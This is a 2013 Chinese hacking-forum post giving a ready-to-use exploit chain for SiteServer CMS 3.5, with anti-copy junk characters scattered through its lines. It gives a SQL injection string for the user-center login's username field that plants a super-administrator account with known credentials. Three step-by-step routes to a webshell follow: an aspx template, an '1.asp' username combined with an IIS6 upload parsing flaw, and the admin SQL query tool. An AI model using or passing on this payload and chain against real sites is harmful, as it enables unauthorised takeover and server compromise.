找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2694|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
# n& u5 M" s% t, N. ]stieserver官网:www.siteserver.cn8 k4 u6 B, L2 X: w8 T' b. ~
EXP:8 S; W8 \, l( U& M
直接访问UserCenter/login.aspx
: B$ R1 m; v5 w3 t用户名处输入:
% A. d+ \" ]; @2 Y2 Q$ P! I( Y7 W+ E2 d
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–( d* r* S  B8 R  l+ p, m6 O9 k5 t* y
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
5 m; X! Q7 c! a) z& M: `$ `之后再访问后台SiteServer/login.aspx用插入的用户登陆6 l% ?" y7 ]% J1 F- D9 L! j. g
后台拿webshell的三种方法:4 e6 W0 D- h) g0 ~% I6 V* a
一、; Q+ B1 [6 F9 L5 K- Z7 `0 `) P
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
& [: O# r  j2 i/ N  Y6 U4 P2 C+ ^/ B二、9 B% m9 W5 ?6 U/ {- I
成员权限-》添加用户-》用户名为:1.asp
3 }  i6 h# _4 ]2 ~( S/ A/ Qhttp://127.0.0.1/usercenter/  E4 \0 |4 O! K- ^9 A
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
! w; ], f# ?1 h7 D) D& C+ t(ps:后台添加用户时不会验证是否含有非法字符)
+ L5 S- |" T- O& t! m- }三、
, ^8 w( y) v4 N5 {% ?7 o) p系统工具-》实用工具-》机器参数查看
( u) @* P' e2 y' a% L' y2 ~' S可以看到数据库类型、名称,WEB路径
) [8 N! w" C. @# T8 Z$ l系统工具-》数据库工具-》SQL语句查询
* P0 ~$ d- D1 u; h  `这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表